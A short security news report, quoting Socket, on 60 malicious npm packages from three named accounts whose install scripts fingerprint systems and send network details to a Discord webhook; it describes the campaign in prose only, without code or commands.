Over the past two weeks, unknown cybercriminals have published 60 malicious packages under three npm accounts: bbbb335656, cdsfdfafd1232436437, and sdsds656565. Each of these accounts published 20 packages containing a short script activated upon installation. The script collects hostnames, IP addresses, DNS server lists, and directory paths and subsequently transmits this information to a Discord webhook under the attackers’ control.
The script targets Windows, Linux, and macOS users; it uses basic sandbox‑evasion checks and fingerprints any system interacting with a malicious package. All packages contain the same data collection code and send the stolen information to the same Discord webhook.
“Combined downloads now exceed 3,000, giving the threat actor a growing map of developer and enterprise networks that can guide future intrusions. As of this writing, all packages remain live on npm. We have petitioned for their removal,” — Socket.
The script collects both internal and external network identifiers, which enables the attackers to link private developer environments to their public‑facing infrastructure.
“The script gathers enough information to connect an organization’s internal network to its outward‑facing presence. By harvesting internal and external IP addresses, DNS servers, usernames, and project paths, it enables a threat actor to chart the network and identify high‑value targets for future campaigns,” — Socket.